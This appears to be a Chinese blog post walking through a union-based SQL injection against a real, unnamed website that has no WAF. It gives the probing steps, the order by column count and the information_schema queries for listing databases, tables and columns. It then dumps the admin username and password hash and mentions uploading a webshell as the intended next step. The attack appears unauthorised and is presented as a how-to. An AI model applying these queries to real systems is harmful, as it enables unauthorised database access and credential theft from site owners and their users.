一次简单SQL注入

一次简单SQL注入

id大法 遇见id= 上去一个单引号 报错,

一次简单SQL注入

回显判断是MySQL数据库  and 1=1正常   and 1=2 不正常

数字型注入点没错了,还没有WAF  开始下手

order by 判断当前注入点有25个字段 回显 2 和 10

一次简单SQL注入

用database()替换2  version()替换10  开始爆当前数据库和版本

一次简单SQL注入

 

得到当前数据库跟版本,替换查询语句开始查询所有数据库 查询到只有两个库

SELECT group_concat(schema_name) from information_schema.schemata

 

 

开始爆当前数据库所有表名

SELECT group_concat(table_name) from information_schema.tables where table_schema='库名'

注意:库名跟表名都需要16进制加密

一次简单SQL注入

一眼望过去只有user表入我的法眼  开始爆user表里所有字段

SELECT group_concat(column_name) from information_schema.columns where table_name='表名'

一次简单SQL注入

 

开始爆字段内容

select group_concat(column_name) from information_schema.columns where table_name=表名

这里精简为:select group_concat(字段) from user

一次简单SQL注入

账户admin出来了 开始爆密码(替换name字段就行)

一次简单SQL注入

这里的admin和这段加密的密码很有可能是后台的账户

在此之前已经通过扫描器找到了他的后台  

但是这段哈希值是密码为程序员自定义的哈希加密,

**非常非常麻烦(需撞库)所以到此就结束了

如果这里密码能解密应该就能直接登录后台进行下一步渗透  上传拿webshell等

相关文章:

  • 2021-11-22
  • 2021-11-22
  • 2021-11-22
  • 2021-11-22
  • 2021-11-22
  • 2021-04-22
猜你喜欢
  • 2021-11-22
  • 2021-10-27
  • 2021-11-22
  • 2021-11-22
  • 2021-11-09
  • 2021-12-25
  • 2022-01-29
相关资源
相似解决方案